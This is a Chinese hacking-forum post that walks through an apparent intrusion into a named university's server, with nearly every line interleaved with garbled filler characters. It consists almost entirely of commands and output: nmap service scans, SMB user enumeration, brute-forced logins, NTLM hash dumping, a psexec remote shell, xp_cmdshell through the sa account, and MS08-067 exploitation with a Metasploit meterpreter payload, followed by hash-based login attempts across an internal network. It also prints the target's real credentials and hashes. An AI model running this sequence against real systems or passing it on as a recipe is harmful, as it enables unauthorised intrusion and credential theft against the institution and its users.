中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/& ?' u7 \7 X# b; B1 D
, f" T  M, O" ^6 o
root@bt:~# nmap -sS -sV 202.103.242.241
/ h0 E" B4 K9 ?/ y% L/ d( D; J9 d' H, C. t, h& m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
% z. F0 t4 \: X" t/ p3 B& o6 p: p' \* X
Nmap scan report for bogon (202.103.242.241)
+ ?) Q6 {9 n: ]/ n: s( K2 B5 _: A4 I2 l' _) v8 x( h( N; Z$ |
Host is up (0.00048s latency).
) i* J3 j4 {: `5 \) Q- y& @% F7 n( i! z3 t0 N6 }  o) i
Not shown: 993 closed ports" l6 S3 I* S/ ^6 u( Q
0 V' H7 p% {- A8 x9 a& M
PORT     STATE SERVICE       VERSION
. F" Y0 i5 L  C7 B: |
) S- }* J7 a. \2 T$ E1 R* A135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
( Z1 G' |: O2 E& C7 T% {
' M" ?. w: p( t9 I- U, e139/tcp  open  netbios-ssn3 [' [6 P: @. B+ P
7 N& A6 p' g  e) U4 g( y& b* Y
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
% }( m/ T7 C2 y4 [& u
& {( J8 t/ Z" V- n; ]$ E1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)$ V+ q1 L% L2 n  x
& P% R8 _/ S1 ~
1026/tcp open  msrpc         Microsoft Windows RPC
1 S0 W1 |% B6 y7 n9 l! e/ L4 L: [) P4 {
3372/tcp open  msdtc?* i. _8 S, \! i: {% C# w

! z" v" p6 \4 `3389/tcp open  ms-term-serv?
7 u# X3 \  h1 H8 J! y8 e+ \% W( E, J+ U9 b: P. |" X% k
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
$ G, n5 @% U/ J! [0 {SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
: Z3 v8 N1 J! v3 x% P
+ X1 [8 d; p6 E+ _8 L5 S/ kSFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
3 i8 h& }; q5 w- _3 R- `! T; u. L! @; ?  c0 M5 e2 w3 V3 c
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
6 ]3 O5 T# A- D; v' Y$ W; y0 P$ U6 R
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
2 w) Y) ~* g$ o' U4 I8 \* ?( e4 F4 A/ j1 T7 N3 a& A5 S; A9 n
SF:ptions,6,”hO\n\x000Z”);
4 z. b3 t; f- N1 S5 L
4 J4 l" W" V# M9 s$ pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); e! k2 E5 L! K6 C# B

$ F; V# L, s1 d; B. P8 L" Z& pService Info: OS: Windows
6 X% `1 r0 w. [0 I1 Z+ K/ E: k0 X" n( y% l
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
* _8 A  Y: r# M" X$ W1 G7 G2 Q2 C! }2 }
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds4 h3 M$ |  o9 J# e% [

  k1 U1 y# |1 ]( Z+ broot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本1 W2 B) x) G) m/ {# }2 [  ~# L

' E& f0 w) o# R-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
( t- E' L. t: B2 n$ s) T" O5 J6 [) }# @; B/ z  y6 A( i
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse2 g5 [6 a4 a3 K/ j# F  ?

0 L  }2 u+ t# E$ J7 J$ [. \! i-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse. o1 A6 M9 S, d, f2 M$ @- ]

& t4 d! R8 ^# u4 I! m# [/ w-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
+ K% S3 {) I) G; ~
! S; L7 G0 M1 O; ~9 I3 f  m2 V-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse- w8 _0 e- _. U! @- H; E& ]
5 }) a4 ~, T: o6 P8 z& r
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
5 ]4 N* J5 x$ U2 v2 B5 Y$ ~  ?1 d
/ R9 U# U: q. j4 l-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse3 t6 U/ T! ~1 C; q
9 f9 g7 u# a( q; F2 |
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse  i" B) U. s. \$ {1 J. j' p2 c

: h* B( V, t; U7 {2 w-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse: z. P- d6 m6 w! [) r2 U

5 `; d+ e- |  o6 I) t/ O/ A8 k) r5 [-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
3 R* I& m2 d/ l) V7 y
( }3 C: x" |. ~& R" Y+ R/ Q-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
- Y9 N6 q" l8 t* k$ u# c' `$ J3 L9 j3 {2 B" |7 p8 R- m
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse, m% J8 L/ U" |% W9 T4 l( L6 ~6 ~
7 k: F. l6 F1 Z* h9 z2 B6 H, S
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse5 ~; g5 E# ]- X5 V) T9 H

( T! l7 k5 ?! x1 Z! g-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
' |4 C2 e4 P1 X
1 `" v9 t2 f" ~; u2 D, l  W2 z-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
/ x, k0 B  B6 g+ C9 A5 H6 d. y% C+ q+ s9 \$ u5 l2 k
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   : [+ u! Q( v4 g8 J
: ]% H* y- S) |
//此乃使用脚本扫描远程机器所存在的账户名
+ I# o" W8 L6 k( y
7 g2 J7 Q$ e( ?" \/ RStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
) j3 M6 l2 D0 G& r
# p. w: x! t% |. g3 ^3 `Nmap scan report for bogon (202.103.242.241)
5 O5 C9 d  |  k  X+ [8 I# l( }+ P# v1 j
Host is up (0.00038s latency).4 v3 h. g: @: k

- l( d) Y7 x: e8 S0 PNot shown: 993 closed ports! a7 g2 c) }7 _5 D0 i+ ?/ G4 u
) k+ c& o) z5 Z. c3 N7 e0 Y2 m
PORT     STATE SERVICE( X. Q# D! J, u) E' B% ]
/ Q( A0 h& x* P& \; l
135/tcp  open  msrpc" u3 d$ X% X4 A% o8 w, m
$ ^" d) c# u# P+ Q
139/tcp  open  netbios-ssn+ K. Y8 C  w  l2 N. y* ~7 S
8 R! ]% q/ @; B; L" _! ?5 M
445/tcp  open  microsoft-ds- w7 f6 n: X$ }; R

# u8 o+ C1 B  \' o, a# V1025/tcp open  NFS-or-IIS
, W% S8 j; L0 f3 q) p  ?( R0 h- R
( R) `0 o; K! w1 ?" a+ B" o& s1026/tcp open  LSA-or-nterm
/ w+ X! s4 E/ K' u0 s
, P; L$ o. ]' ]! A/ Q& r3372/tcp open  msdtc
& d) J( N$ d( C3 B4 _+ K4 S  n  Q. h7 Z; O1 L8 O4 z$ I
3389/tcp open  ms-term-serv; E) `; |3 Y  D. u

' P9 F  F" n2 ?2 H8 HMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( C+ L4 _" D, W. i$ h
( Z# R# S& I4 b' }+ y3 Z) ~
Host script results:( u+ I* ^- X  t! _' q

, D$ `; p4 g) l& w| smb-enum-users:
$ r/ c  Z- R$ K6 g" [$ i, Q4 p! {
8 Q% h* @  Z/ y7 |7 I|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果) O! c- Z0 ?" H1 O
4 b; q; k7 X9 O+ J; S8 S- t, F
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
( @1 H3 T  X9 I" N+ }4 ]" P1 y
. A+ s# c, n8 v" e' X! e" s+ kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
  c! c* g8 }7 C2 `; s: V
) w/ N, P+ e% a/ M  f//查看共享; G) d3 ?8 d' N% x
; a' q1 ^2 N+ O/ s) s
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST6 D+ h  z2 g4 t9 `" u4 D  }- t
) B: O  U" j5 q9 y# Q% k
Nmap scan report for bogon (202.103.242.241)
) o% e; O$ X9 M! j/ p2 y8 ?
5 i* Z5 H4 i4 m4 H3 G6 LHost is up (0.00035s latency).+ k( I" I& g% c' s

* Z5 A' F3 E# e" Q" ]$ K: P$ Q6 h( }Not shown: 993 closed ports
4 z' B3 S- `9 I2 k( z1 g+ o  @( i- e( x
PORT     STATE SERVICE$ s3 K+ w: q3 N6 i- g

) F5 k, c$ I' ~* J9 p135/tcp  open  msrpc
9 r" I0 `! s4 Q" F! b/ h2 n1 r2 i
5 g8 F1 ^$ i; H- U9 j139/tcp  open  netbios-ssn  {4 ?4 ^5 c- S  `8 t

5 N* C$ x3 `: l7 k) j445/tcp  open  microsoft-ds" C+ k2 G8 L1 n; e3 t* [8 z) ?

5 }* s  q8 k5 _! j1025/tcp open  NFS-or-IIS% |1 V/ B0 w$ K4 B4 e) b' a0 B, h" q

( K( }% t% h& t+ M! l! Q1026/tcp open  LSA-or-nterm5 d. G7 I4 [. r2 W5 s$ b

* L3 h. S" t4 Q3372/tcp open  msdtc; J) I8 F6 }. w' y0 G
  T1 i! G, Q6 {$ A8 |0 P: n
3389/tcp open  ms-term-serv- _# @) C* w9 S
7 R2 Q6 V; [# @; D( w" l( U1 H
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% ^/ N7 ]: ~% {9 Z

& y! H; P* w( q5 @0 D6 g5 O% Q  RHost script results:9 Q) C0 ?6 y8 S' ^( A
. {  t; U: v2 C* }2 h
| smb-enum-shares:# X. b/ f3 C1 W& {6 H

+ X2 k; A  {! f& T|   ADMIN$3 e& o' Y) U% D- c$ q
  g7 [6 I7 r. ?7 Z! h
|     Anonymous access: <none>
6 @% U7 K' _% G/ B+ c* N2 ?1 u2 `+ Z
& n, R! T$ A1 C- J, g9 k4 X|   C$
  D% S9 S+ A' k* y% k& y/ _! C, `) j5 K: k4 c9 g
|     Anonymous access: <none>' u! a) P( t" K; F0 D9 y/ c+ h
) X+ V/ v' J! X5 o
|   IPC$
( g1 p1 k( M, Y3 a) Q0 ^7 ]/ f1 L1 O, a6 `2 h( @5 ?6 \$ A+ ^+ i: W: Y2 [
|_    Anonymous access: READ
, P8 Z0 N- N' N: Z3 ~" J3 J# W* B& k
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
) Y2 y& d7 s8 I+ H6 [" `9 K! r
8 Y, o& i9 P0 g9 x& D1 g/ q' Oroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       ' I9 K$ `% o4 H5 C0 d6 o7 U

% l- l) j$ h# Q  k! y* u//获取用户密码
( U( O: S) W9 o3 q, P& I4 K  x; j0 t+ h0 L
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
7 L- n2 o# M9 G: }
5 g$ b1 Y! e# _! R1 x! K' T1 wNmap scan report for bogon (202.103.242.2418)
/ E1 c- n  T2 w$ Q2 j0 s
+ I. `" B' u& t1 l$ N# ^8 N* E! L: DHost is up (0.00041s latency).9 u) H, x3 h" _+ X
0 w" n' o$ X) E7 w1 w" H8 i
Not shown: 993 closed ports* N& c+ R' ?# d; P
# w/ o8 q0 t" Y4 S) }, |+ I
PORT     STATE SERVICE
2 n* l/ g8 Y0 A& a" @, I$ O  f# A  ]0 H3 u2 o1 M7 L7 M
135/tcp  open  msrpc/ k# K/ W: @% p
- c4 J' w1 e5 m: w( }& o) t" h
139/tcp  open  netbios-ssn: S$ n( x8 a2 M

/ O( }4 V7 m0 ?1 v. G1 m4 v4 e( H445/tcp  open  microsoft-ds) g1 F8 V& r3 T- ^% p1 i5 L- M# T

+ N& \6 X* Z; C2 j1025/tcp open  NFS-or-IIS
7 G" f* \* a' {: x" G' p
5 A) v. r0 [4 Z6 ~( K1026/tcp open  LSA-or-nterm8 b. X1 z) E: e8 {
5 \! n' ^4 i* W) l8 Y
3372/tcp open  msdtc( y% {. f( y) p& K; g4 M4 n

/ [5 ?" q2 B6 j8 y' r3389/tcp open  ms-term-serv# x& o1 S" f5 r: T# I; z( }3 w* o

. Z! u# M* g  w3 ~MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 Y6 T# Y5 S' U$ K- R, F  O- u) H& `1 p+ n7 O5 o$ a
Host script results:
, O$ @& s- `1 k# l8 e8 w4 q9 V  L
| smb-brute:
/ M# s1 P9 s* E& I8 W: R0 c
  L( h/ A5 P, M: `( b; [# _administrator:<blank> => Login was successful/ n! S- @+ a8 A

, L1 y& N* q) N& q( X+ k/ X|_  test:123456 => Login was successful
8 _6 h$ O5 n& R. l' Y/ t9 N6 ]
" o3 z! u/ T7 X/ VNmap done: 1 IP address (1 host up) scanned in 28.22 seconds8 v( l/ M# a1 ]7 ?% g( _/ d

4 x* ~8 K  R5 y2 p7 W* G( _root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
( O9 b: @  C! X4 o, q; e2 E
, o) O. ?: V! ~root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data& U' ~5 s7 x# P' S
2 P  h0 E/ \0 q+ e1 m: f$ U( `
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse' M* I, ^- e" x$ ^6 b

0 ]6 E0 B& K) ~, d$ Sroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139. W6 {* W4 v  }* E, {9 w! L

# o: y4 H- a+ j( h! ?# S4 |6 KStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
4 {4 w$ q0 ]6 l. y9 z% A3 W5 Q4 W2 K* X" M( H4 S
Nmap scan report for bogon (202.103.242.241)/ ?& W; M7 I, k7 ^# N
6 m9 P0 k2 w* y# J/ S7 [6 S8 W' G
Host is up (0.0012s latency).8 X1 J* \! @4 a
2 R4 q% V$ q' o( D
PORT    STATE SERVICE& H1 J! B1 s7 n8 ^' m. V

: \3 D( U# v7 p7 j& v135/tcp open  msrpc# N) Q: W" i+ m5 p- W8 U" i
/ ~. L8 x# Z* _6 x
139/tcp open  netbios-ssn# ^; a2 T1 J- N6 P/ ?, [8 }) ~

' P0 M0 |; q1 m- t( c6 O445/tcp open  microsoft-ds
7 S% u( j% v4 o$ X2 p7 v3 b4 j8 l( @, B$ m& G" r; t
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 M/ z- [- }) V# G5 R; o( Z6 A
" i& O  S& G9 `/ L" R
Host script results:
, P# [, t9 Z2 v' g8 D0 m7 H; X- ]: B. P2 i& ~' b# E
| smb-pwdump:9 W' |! J# N/ g0 i! W, ^2 @5 ?
" e% h- r& r4 }7 k
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************7 r& D+ J& j4 I! N# e8 y
! G- j) m; h  E, E  |
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
4 x* r2 G: n) ^6 E) w. m. w7 n* e* ?; _! t
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
7 m* ]7 @# F  N9 r- M
  C/ A! s' h0 m5 z( C9 S|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
1 a) C: i( j4 O1 K* A
3 f  x% R' x& |% wNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
% W1 d, Y  g" _
# `  S- U# k* q& `. a" AC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
" c- D5 E4 n  K% A+ M) p9 W" Q% P7 t6 G7 }
-p 123456 -e cmd.exe* x) n/ O2 x9 e5 x8 q' r: g# I
! \% F+ p6 i$ p
PsExec v1.55 – Execute processes remotely7 G& s! c, p. o* k4 K4 v$ ]
. |: {; y" z0 M$ }
Copyright (C) 2001-2004 Mark Russinovich
( F2 Y. u8 l+ E1 w5 M
2 `2 W7 |& S5 GSysinternals – www.sysinternals.com* \1 `/ }' f+ U# w4 D! P

5 R6 V9 q; _3 H: n" z) j5 S, WMicrosoft Windows 2000 [Version 5.00.2195]/ _7 i- U: R5 m* U

( o* Y: j% H' D  ^) g7 [(C) 版权所有 1985-2000 Microsoft Corp.( M; @8 Z% q1 Q: Y& ~4 J

1 w! v1 z8 C1 M9 [( B2 k9 ?C:\WINNT\system32>ipconfig
3 D! S9 r4 [% O4 h( X! F& u4 d& v. v5 X8 U  u
Windows 2000 IP Configuration. _/ D7 M2 w$ Q/ J2 B* [

6 J9 R; X/ ^$ ?9 @- W3 }Ethernet adapter 本地连接:
( q2 y) X8 q- q& t7 B4 e$ M5 G: Z4 M5 x; v1 n
Connection-specific DNS Suffix  . :
  s1 m& I8 z; c9 d1 H' `/ s% m/ ]1 e" I
IP Address. . . . . . . . . . . . : 202.103.242.241  g, D% ]3 ?$ X: o8 n3 ]
6 k% F1 Y' C1 k% a# g% e& `; O
Subnet Mask . . . . . . . . . . . : 255.255.255.0
) B4 s5 T$ m" F# b) {* a/ v3 D# C/ u
3 C3 j4 T4 B& q' s/ ?+ pDefault Gateway . . . . . . . . . : 202.103.1.1
# T' P" {* d  R# r) C5 S& M. t" c! V. T3 M8 d2 a, h
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令. O5 v% T: j% F
' W8 E( ?: O5 Y: e
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
. I* C+ G; y# a' v3 s8 b0 b7 T- R; n& Q' `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
  H& c2 S- z4 d% E  Z* Q% ~9 V  v* U& w5 O. o$ A% F! ^. A
Nmap scan report for bogon (202.103.242.241)
) a3 C6 W) z1 H) T; K; X8 \1 P
4 [" _: Y$ c5 {5 h- _Host is up (0.00046s latency).) f) p4 o0 W* Z) w% {% B1 I$ q2 R
) }1 h; O* G" ^5 H
Not shown: 993 closed ports
- j1 I+ |9 X) p* @
' U+ Z$ c: U  ~* K; `% o' KPORT     STATE SERVICE
2 j& m  x8 E) d. a
2 o" T9 J/ m7 [! B( o2 b) @135/tcp  open  msrpc
$ ]( T# Z+ W2 o* c% g1 V. h: U$ R
139/tcp  open  netbios-ssn
' s. X! K6 H* W( _/ k7 \5 k2 E5 C) [
445/tcp  open  microsoft-ds, @  j; K( g. s* D* D& \

; _( k# k% ?! q, @1025/tcp open  NFS-or-IIS
; a( q! \$ W$ i, F+ [) l4 B
  k, W9 i5 ]* ^* X" d% m, e1026/tcp open  LSA-or-nterm' G+ F! y! a6 U' E

: ]& \6 r' ~) E4 x. P3372/tcp open  msdtc. J, o# v1 f% J2 U
  B9 m6 M# s5 Y( `- V# e' @
3389/tcp open  ms-term-serv
- l- U; ?' F  \7 L
5 H5 x5 J2 e. LMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ A- ^8 ?) w% T, E) x& r, q$ D% J1 Q  D
Host script results:( F# H: s' [$ n6 Y8 ~& X! Q
! H: U) W# e$ ~) Y3 |- N5 {
| smb-check-vulns:
' A7 m+ Z: O% z- I9 H9 S9 K. }7 R3 P7 [  ]: ]& x
|_  MS08-067: VULNERABLE
. X" O9 Z$ s7 T2 c. O! V  Q3 J
! i1 q; w1 E. O4 k( f, d- \& UNmap done: 1 IP address (1 host up) scanned in 1.43 seconds0 O$ W( T# L1 v+ X7 q

6 c$ t" R! E( \% Xroot@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
* }# K0 O3 j1 i# _& k8 c  L) C  V5 g5 f
msf > search ms08
. I: N% }6 D5 F8 t0 u7 _0 T, T# O& d) b/ c2 C
msf > use exploit/windows/smb/ms08_067_netapi
3 }( M. ?8 b7 f9 k$ [
$ B  E' ~8 B) m' Y" omsf  exploit(ms08_067_netapi) > show options
& Q! N: E6 F, Y1 n% X
- h( W# t; h+ N% A# Mmsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
% y2 W, G) V; |7 `* m# U  j4 N+ e8 G6 T; _( v
msf  exploit(ms08_067_netapi) > show payloads
0 ~3 w( T9 J) r* P5 d! |0 \/ l6 D1 Q# y- t% n8 E" Q( B
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
$ r6 y( C* {0 a# ^) P* v! c
; L+ y$ p* f* umsf  exploit(ms08_067_netapi) > exploit8 t4 N# n4 _9 s7 x. ]% K4 h: D

/ W3 E) |# v0 _4 ^" Z7 `meterpreter >& r- \4 B& {7 r+ Q  @4 z* x2 r

. c/ Q. x% q6 J! Z. n- m/ |/ ]Background session 2? [y/N]  (ctrl+z)
' c' w+ ~( R- {$ i2 n  b, ]3 W0 K! T( C- `0 p& q$ i
msf  exploit(ms08_067_netapi) > sessions -l
% R; m" u: F4 U6 W3 j9 D" K; X/ w: t# h- q" t9 ?3 B
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
0 E$ V5 a2 C# _/ X$ r: M5 E( D- A+ n# y
test
  W- c; F  P! a/ u7 ^
5 F. h8 R4 q9 D5 d& H" Padministrator
( k. {; Z8 U% U/ A3 R
" |7 ^0 ^5 R5 w: |5 qroot@bt:/usr/local/share/nmap/scripts# vim password.txt
; v+ X( w8 v$ K0 F: h7 F& x
6 }# w; g# M4 o& t! U0 T- t% c4 u" l& F44EFCE164AB921CAAAD3B435B51404EE
3 ]3 u$ ?7 x- |! B9 x' I! ?) @' U+ `  y: w
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ' G4 m' g  k. A! z" l, S+ Y$ }

+ i0 b0 q4 Y& d& T2 D" m //利用用户名跟获取的hash尝试对整段内网进行登录
  T5 C6 D+ V; n4 j: D+ k: [9 `7 C; D
Nmap scan report for 192.168.1.105  E# x" U) _+ |% w

6 R) G6 \$ a' g7 l" CHost is up (0.00088s latency).$ F* x2 Y3 |2 o- w# ~

$ l. l: c+ A; FNot shown: 993 closed ports; W: A$ C2 N- G- ]# o

$ E) `+ d5 V! B1 MPORT     STATE SERVICE) p! Q) e* N% D: G: P
$ {; b% K$ c/ Q! y* r
135/tcp  open  msrpc2 N( S/ b7 w5 D
* W6 L' W: c! v* w
139/tcp  open  netbios-ssn
7 u# Z) X( K; N5 c- d. `8 I) P6 T7 V- u9 x$ R
445/tcp  open  microsoft-ds) o% \% Z* ?& F* j9 t/ j9 v

! y3 M! a0 h$ h/ D4 r4 D1025/tcp open  NFS-or-IIS
; B' \, |2 b3 _9 w5 y/ a- @6 z: p4 c( X, L. j
1026/tcp open  LSA-or-nterm
- j- L, W& n; E  }4 M3 t
. O( u3 J2 L% A3 n( C3372/tcp open  msdtc' H$ ^7 T3 f- o$ y0 L. }

6 w$ z7 Y! W9 x" w( H3389/tcp open  ms-term-serv9 a- Q0 s0 n: }3 C) z5 h

* P1 v. l2 l6 E' n9 [4 rMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ P& W( ~* M7 F( s! j" w, g
) u/ x9 P; {" Y5 V6 xHost script results:
' M* [- Z& R+ w0 D% x# {
. t8 c" R" k3 p% w: [/ a| smb-brute:
) q" q4 u- X, F+ N9 t! p; x1 e. K& A! }% [$ |, b) C; B3 C
|_  administrator:<blank> => Login was successful' j9 I7 I; w1 C3 `8 t' }9 G
  F+ m5 Q( a4 ^8 Y  y+ B& o
攻击成功,一个简单的msf+nmap攻击~~·9 `) n4 z8 p+ L, u3 R- e# m8 e

* u2 L3 ]' B- k. {



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2